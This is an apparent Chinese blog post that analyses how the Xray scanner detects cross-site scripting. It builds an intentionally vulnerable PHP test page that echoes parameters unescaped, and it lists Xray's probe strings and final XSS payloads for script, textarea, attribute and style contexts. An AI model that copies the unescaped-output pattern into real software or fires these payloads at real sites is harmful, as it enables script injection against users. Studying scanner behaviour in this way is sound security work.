主页 > 网络知识 > XSS扫描器成长记(2)

XSS扫描器成长记(2)

由于Xray没有开源,所以就通过分析日志的方式来看它的工作原理。

准备工作 <html> <body> <a href="?q=1&w=2&e=3&r=4&t=5" /> <script> <php foreach($_GET as $key => $value){ // $_GET[$key] = htmlspecialchars($value); } $q = $_GET["q"]; $w = $_GET["w"]; $e = $_GET["e"]; $r = $_GET["r"]; $t = $_GET["t"]; if(stripos($q,"prompt") > 0){ die("error"); } $var = 'var a = "'.$q.'";'; echo $var; > </script> <div> <textarea><?php echo $w;?></textarea> </div> <input style="color:<?php echo $e;?>" value="<?php echo $r;?>"/> <!-- this is comment <?php echo $t;?> --> </body> </html>

简单写了一个脚本,用来分别测试xss在script,style内,html标签内,注释这几种情况下xray的发包过程。

发包探索

1.对于在script的脚本内的回显内容,对于以下case

<script> $var = 'var a = "'.$_GET['q'].'";'; echo $var; </script>

X射线顺序发送了以下payload:pdrjzsqc,"-pdrjzsqc-",</sCrIpT><ojyrqvrzar>

最后会给出payload,但这个包并没有发送。后面把prompt作为关键词屏蔽,发现最后还是给出这个payload。

还有一种情况,在script中的注释中输出

<html> <body> <script> var a = 11; // inline <?php echo $_GET["a"];?> /* <?php echo $_GET["b"];?> */ </script> </body> </html> xray会发送` ;chxdsdkm;//`来判定,最后给出payload ` ;prompt(1);//`

2.对于在标签内的内容,针对以下case

<textarea><?php echo $_GET["w"];?></textarea>

xray顺序发送了以下payload:spzzmsntfzikatuchsvu,</tExTaReA><lixoorqfwj>,当确定尖括号没有被过滤时,会继续发送以下payload:</TeXtArEa>sCrIpTjhymehqbkrScRiPt,</TeXtArEa>iMgSrCoNeRrOrjhymehqbkr>,</TeXtArEa>SvGoNlOaDjhymehqbkr>,</TeXtArEa>IfRaMeSrCjAvAsCrIpTjhymehqbkr>,</TeXtArEa>aHrEfJaVaScRiPtjhymehqbkrClIcKa,</TeXtArEa>iNpUtAuToFoCuSoNfOcUsjhymehqbkr>,进行关键词的试探,最后给出payload为</TeXtArEa><img src=http://www.52bug.cn/hkjs/1>

3.对于在style里内容,以下case

<input style="color:<?php echo

xray顺序发送了以下payload:kmbrocvz,expression(a(kmbrocvz))

4.对于在html标签内的内容,以下case

<input style="color:3" value="<?php echo $_GET["r"];?>"/>

xray顺序发送了以下payload:spzzmsntfzikatuchsvu,"ljxxrwom=",'ljxxrwom=',ljxxrwom=,当确认引号没有被过滤时,会继续发送以下payload:"><vkvjfzrtgi>,">ScRiPtvkvjfzrtgiScRiPt,">ImGsRcOnErRoRvkvjfzrtgi>,">SvGoNlOaDvkvjfzrtgi>,">iFrAmEsRcJaVaScRiPtvkvjfzrtgi>,">aHrEfJaVaScRiPtvkvjfzrtgicLiCkA,">InPuTaUtOfOcUsOnFoCuSvkvjfzrtgi>," OnMoUseoVeR=xviinqws,最后可以确定payload为"><img src=http://www.52bug.cn/hkjs/1>,"OnMoUsEoVeR=prompt(1)//

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!